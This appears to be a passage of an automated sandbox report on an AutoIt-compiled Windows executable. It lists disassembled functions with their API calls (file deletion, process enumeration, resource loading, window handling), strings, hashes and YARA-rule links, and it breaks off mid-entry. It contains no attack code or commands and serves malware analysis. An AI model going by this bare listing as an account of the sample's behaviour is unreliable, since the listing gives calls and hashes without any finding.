                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
                                                    • String ID:
                                                    • API String ID: 2813406015-0
                                                    • Opcode ID: 75f4517a4e7e5576e8f4d844380b6f255ce5864a3820eb7989f6cbdf5e1b11fe
                                                    • Instruction ID: cd749ab0a88b93f5215938f55f8c6aa7e9932d02ec37bb987f8a9b7c6e4f088a
                                                    • Opcode Fuzzy Hash: 75f4517a4e7e5576e8f4d844380b6f255ce5864a3820eb7989f6cbdf5e1b11fe
                                                    • Instruction Fuzzy Hash: 4191E53544A7C4DEC732DB789965AABBFE5AF26300B444D5EE1CBD3A01D220ED08C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00423D4E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                      • Part of subcall function 00424CD3: GetFileAttributesW.KERNELBASE(?,004253F4), ref: 00424CD4
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00423DC5
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00423E15
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00423E26
                                                    • FindClose.KERNEL32(00000000), ref: 00423E3D
                                                    • FindClose.KERNEL32(00000000), ref: 00423E46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: b1fe2c7f450679c1e58edd501c4fbf01b76b7c523c99098a2a96cacf527ae1bc
                                                    • Instruction ID: 783887d69bd4e5896128145739be46e97ed5856d33e2c0d10c8dd688f6f8ad8c
                                                    • Opcode Fuzzy Hash: b1fe2c7f450679c1e58edd501c4fbf01b76b7c523c99098a2a96cacf527ae1bc
                                                    • Instruction Fuzzy Hash: 98316132109355AFC202EF60EC91DEF77A8BE96311F444D2EF4D186191DB299E0DCB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4FE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C4EEE,?,?,00000000,00000000), ref: 003C4FF9
                                                    • FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,00000000,?,003C4EEE,?,?,00000000,00000000), ref: 003C5010
                                                    • LoadResource.KERNEL32(00000000,00000000,?,003C4EEE,?,?,00000000,00000000), ref: 003FDD60
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,003C4EEE,?,?,00000000,00000000), ref: 003FDD75
                                                    • LockResource.KERNEL32(?,?,003C4EEE,?,?,00000000,00000000), ref: 003FDD88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: da790a4b6dc60d67f7b9072eaf56402568bc6afd606db32857ca7080b7b27902
                                                    • Instruction ID: d05a054017d63742884f93fe59baf761943aacf10a3130e1115458bf4ac85b5a
                                                    • Opcode Fuzzy Hash: da790a4b6dc60d67f7b9072eaf56402568bc6afd606db32857ca7080b7b27902
                                                    • Instruction Fuzzy Hash: 7A114CB6240710BFE7218B64EC49F677B7DEBC6B51F10426DF105C5160CB62B8448675
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00423E91, Relevance: 6.1, APIs: 4, Instructions: 90processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00423EB6
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00423EC4
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00423EE4
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00423F8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3243318325-0
                                                    • Opcode ID: 4e0453a96590fba92540cddffe521d84c7ebf3e5b67e9b6e802879fe04fff520
                                                    • Instruction ID: 47eb147b20222699f2c7b7dfff354cb1d48b12d2a36f155d2d39897da047eeb2
                                                    • Opcode Fuzzy Hash: 4e0453a96590fba92540cddffe521d84c7ebf3e5b67e9b6e802879fe04fff520
                                                    • Instruction Fuzzy Hash: 85319E722083059FD305EF60E885FBFBBF8EF85354F50052EF481861A0DB65AA48CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424696, Relevance: 4.5, APIs: 3, Instructions: 27fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?), ref: 004246A6
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004246B7
                                                    • FindClose.KERNEL32(00000000), ref: 004246C7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 91afc3f0cef84e30f4f2a76764fa1490730b38a98297f90945761989094c8c6d
                                                    • Instruction ID: 8a1c7480f135066d63a62957eb2bbf1a1ae4cd02e7fd44e20b9351b85e8e804f
                                                    • Opcode Fuzzy Hash: 91afc3f0cef84e30f4f2a76764fa1490730b38a98297f90945761989094c8c6d
                                                    • Instruction Fuzzy Hash: 9AE0DF3A604920AB92106738FC4D8EB7F5CEE473B6F500722F939C04E0E779A554C5AE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CFE40, Relevance: 3.6, Strings: 2, Instructions: 1093COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: prH$%E
                                                    • API String ID: 3964851224-3746577361
                                                    • Opcode ID: 5a8ebf8bd6c716a88ad1ffa352a01cf5c1fbc145480f3aad13705b1cd20201b1
                                                    • Instruction ID: abd438bbeebfe46239e0a9344dfbe0d10f4ca70fb481ce1be1265f994874a14d
                                                    • Opcode Fuzzy Hash: 5a8ebf8bd6c716a88ad1ffa352a01cf5c1fbc145480f3aad13705b1cd20201b1
                                                    • Instruction Fuzzy Hash: 6C92A8B16083419FD726CF24D480B2ABBE4BF84704F15892EF98A9B391D774EC45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D0B30, Relevance: 64.4, APIs: 27, Strings: 9, Instructions: 1353windowsleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32 ref: 003D0BBB
                                                    • timeGetTime.WINMM ref: 003D0E76
                                                    • PeekMessageW.USER32 ref: 003D0FB3
                                                    • TranslateMessage.USER32(?), ref: 003D0FC7
                                                    • DispatchMessageW.USER32 ref: 003D0FD5
                                                    • Sleep.KERNELBASE(0000000A), ref: 003D0FDF
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 003D105A
                                                    • DestroyWindow.USER32 ref: 003D1066
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D1080
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 004052AD
                                                    • TranslateMessage.USER32(?), ref: 0040608A
                                                    • DispatchMessageW.USER32 ref: 00406098
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004060AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prH$prH$prH$prH
                                                    • API String ID: 4003667617-658207505
                                                    • Opcode ID: 2b88478c9013bc2ddd77381d48e8d944c8a516ea9754c5fea264b0a510bb8d0e
                                                    • Instruction ID: d5329eb5acc959eb07caa98da41f86582fc92bd13af5a0869e6cad6061caeef2
                                                    • Opcode Fuzzy Hash: 2b88478c9013bc2ddd77381d48e8d944c8a516ea9754c5fea264b0a510bb8d0e
                                                    • Instruction Fuzzy Hash: 54B2DF71608741DFD729DB24D884BABB7E4FF80304F14492EE5899B291CB79E884CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D5F88, Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 362COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(0044F910,00000001,00000000,?,?,?), ref: 003D6042
                                                    • IsWindow.USER32(00000000), ref: 00410FFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Foreground
                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                    • API String ID: 62970417-1919597938
                                                    • Opcode ID: b1f32ef6f01fd1adcf41123fe48aa96101f243b66a792e24c5cf21869e5e2082
                                                    • Instruction ID: 20cd9fa3403e071a9b33bbfc83c805d9e8aed62e7123d521c70cfb7fb68a9d8e
                                                    • Opcode Fuzzy Hash: b1f32ef6f01fd1adcf41123fe48aa96101f243b66a792e24c5cf21869e5e2082
                                                    • Instruction Fuzzy Hash: B1D10630104242EBC715EF61D8419EBBBA4FF14354F104A2FF095576A1CB74E9DACB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C3633, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 003C36D2
                                                    • KillTimer.USER32(?,00000001), ref: 003C36FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C372A
                                                    • CreatePopupMenu.USER32 ref: 003C373E
                                                    • PostQuitMessage.USER32(00000000), ref: 003C375F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated$%E
                                                    • API String ID: 129472671-1317701673
                                                    • Opcode ID: 0abc1e7b138e0d380e698cbbd4f95414cbffa6c4202286352907defdfac6205c
                                                    • Instruction ID: 87b7e799883f706fed0d1337bbdeb6797ba5b4860dea3295ba3fe161ae465041
                                                    • Opcode Fuzzy Hash: 0abc1e7b138e0d380e698cbbd4f95414cbffa6c4202286352907defdfac6205c
                                                    • Instruction Fuzzy Hash: 5F416BB2200105BBDB177F64EC49F7D3759EB01300F16893EFA06C62A1CB699E5497A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C3015, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74windowregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003C3074
                                                    • RegisterClassExW.USER32 ref: 003C309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30AF
                                                    • InitCommonControlsEx.COMCTL32(0044F96C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                                                    • LoadIconW.USER32(000000A9), ref: 003C30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-2659433951
                                                    • Opcode ID: 6ddee08f80c7e01c8e67be3b25ff7d9d57762f3968d55de0c2a659825e1cc079
                                                    • Instruction ID: fe91f6e0f70159e0d2ad23a9a1262e636d07b6f8fe4613b581c98ae1488990d0
                                                    • Opcode Fuzzy Hash: 6ddee08f80c7e01c8e67be3b25ff7d9d57762f3968d55de0c2a659825e1cc079
                                                    • Instruction Fuzzy Hash: BD3147B5841309EFDB41EFA4EC89ADEBBF4FB09310F10446EE190A62A0D3B90545CF59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C3041, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56windowregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003C3074
                                                    • RegisterClassExW.USER32 ref: 003C309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30AF
                                                    • InitCommonControlsEx.COMCTL32(0044F96C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                                                    • LoadIconW.USER32(000000A9), ref: 003C30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-2659433951
                                                    • Opcode ID: 022c02ac51735abb6b4c2a8841a19e3ee4e95a7bd632c9f2b602d3f455d5b62f
                                                    • Instruction ID: a5e5b537c95c71ac7f1fe210968b7271b25bfc6e2857e0aeeb9833c862f5625d
                                                    • Opcode Fuzzy Hash: 022c02ac51735abb6b4c2a8841a19e3ee4e95a7bd632c9f2b602d3f455d5b62f
                                                    • Instruction Fuzzy Hash: F921E5B5941208AFDB40EFA4EC48BDEBBF4FB09710F01452AF514A62A0D7B60548CFA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CFBBD, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 276comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,?,?,?), ref: 003CFC06
                                                    • OleUninitialize.OLE32(?,00000000), ref: 003CFCA5
                                                    • UnregisterHotKey.USER32(?), ref: 003CFDFC
                                                    • DestroyWindow.USER32(?), ref: 00404A00
                                                    • FreeLibrary.KERNEL32(?), ref: 00404A65
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404A92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: ed0443544d38bdbcb8f844bf124fe09b391b197e905a97804f8ee8aa9c884b6c
                                                    • Instruction ID: 52263a45816c803b69d906394287271ef3d9e4b38a53d43e2aeef5bf65f88078
                                                    • Opcode Fuzzy Hash: ed0443544d38bdbcb8f844bf124fe09b391b197e905a97804f8ee8aa9c884b6c
                                                    • Instruction Fuzzy Hash: 03B1AE757011129FCB2AEB14D895F6AF365FF41300F1542BEE50AAB2A2CB34AD16CF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C71EB, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 203registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004862F8,?,003C37C0,?,00000000,00000001), ref: 003C4882
                                                      • Part of subcall function 003E074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003C72C5), ref: 003E0771
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003C7308
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003FECF1
                                                    • RegQueryValueExW.ADVAPI32(?,Include,?,?,?,?,00000000), ref: 003FED32
                                                    • RegCloseKey.ADVAPI32(?), ref: 003FED70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 338900592-2727554177
                                                    • Opcode ID: fb592fcb66233f10f9057283079d3404843da7e26e1cd4a2cdac0a10090d5a53
                                                    • Instruction ID: 77edc1ade32301b2d74c95979db7bbe3281c6519cd409eda8929be51224099f1
                                                    • Opcode Fuzzy Hash: fb592fcb66233f10f9057283079d3404843da7e26e1cd4a2cdac0a10090d5a53
                                                    • Instruction Fuzzy Hash: 8D7168714083059EC316EF25EC91AAFBBA8EB94350B50497EF545CB1A1EB30D948CB6A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C3A58, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74windowregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003C3A62
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 003C3A71
                                                    • LoadIconW.USER32(00000063), ref: 003C3A88
                                                    • LoadIconW.USER32(000000A4), ref: 003C3A9A
                                                    • LoadIconW.USER32(000000A2), ref: 003C3AAC
                                                    • LoadImageW.USER32 ref: 003C3AD2
                                                    • RegisterClassExW.USER32 ref: 003C3B28
                                                      • Part of subcall function 003C3041: GetSysColorBrush.USER32(0000000F), ref: 003C3074
                                                      • Part of subcall function 003C3041: RegisterClassExW.USER32 ref: 003C309E
                                                      • Part of subcall function 003C3041: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30AF
                                                      • Part of subcall function 003C3041: InitCommonControlsEx.COMCTL32(0044F96C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C3B46), ref: 003C30CC
                                                      • Part of subcall function 003C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                                                      • Part of subcall function 003C3041: LoadIconW.USER32(000000A9), ref: 003C30F2
                                                      • Part of subcall function 003C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: AutoIt v3
                                                    • API String ID: 423443420-1704141276
                                                    • Opcode ID: 7e44419db9adc364d9806d8535bbe2e1e9b951ff67b06c86e2a6487629f8335f
                                                    • Instruction ID: 2bdcee30c30ce763d9f8377d0fa59be8278a5f95a3f8e21b9c38a3fbcf6b60e9
                                                    • Opcode Fuzzy Hash: 7e44419db9adc364d9806d8535bbe2e1e9b951ff67b06c86e2a6487629f8335f
                                                    • Instruction Fuzzy Hash: 1B216B75900308AFEB51AFA4EC49F9D7FB4FB08710F1145BEF504AA2A0C3BA16548F58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CF8CF, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 172comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(0000005B), ref: 003E03D3
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(00000010), ref: 003E03DB
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(000000A0), ref: 003E03E6
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(000000A1), ref: 003E03F1
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(00000011), ref: 003E03F9
                                                      • Part of subcall function 003E03A2: MapVirtualKeyW.USER32(00000012), ref: 003E0401
                                                      • Part of subcall function 003D6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00443DD0,00000001,?,0044F910), ref: 003D62B4
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003CFB2D
                                                    • OleInitialize.OLE32(00000000), ref: 003CFBAA
                                                    • CloseHandle.KERNEL32(00000000), ref: 004049F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: <gH$\dH$%E$cH
                                                    • API String ID: 1986988660-2388256643
                                                    • Opcode ID: ce2c76a6bdea7f1f017b870d5a9ccac59f915cd15b2119c374cf0bab580be74b
                                                    • Instruction ID: 39586cc64b4656cd08f5600d6a4e651fb4fb8b82472dfceebd8baf8bd295373e
                                                    • Opcode Fuzzy Hash: ce2c76a6bdea7f1f017b870d5a9ccac59f915cd15b2119c374cf0bab580be74b
                                                    • Instruction Fuzzy Hash: AE819AB09012509EC3C5EF79ED54A1D7BE5FB58B08B12893EE818CB262EB395408CF5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E3469, Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E9E4B: EnterCriticalSection.KERNEL32(?,?,003E9CBC,0000000D), ref: 003E9E76
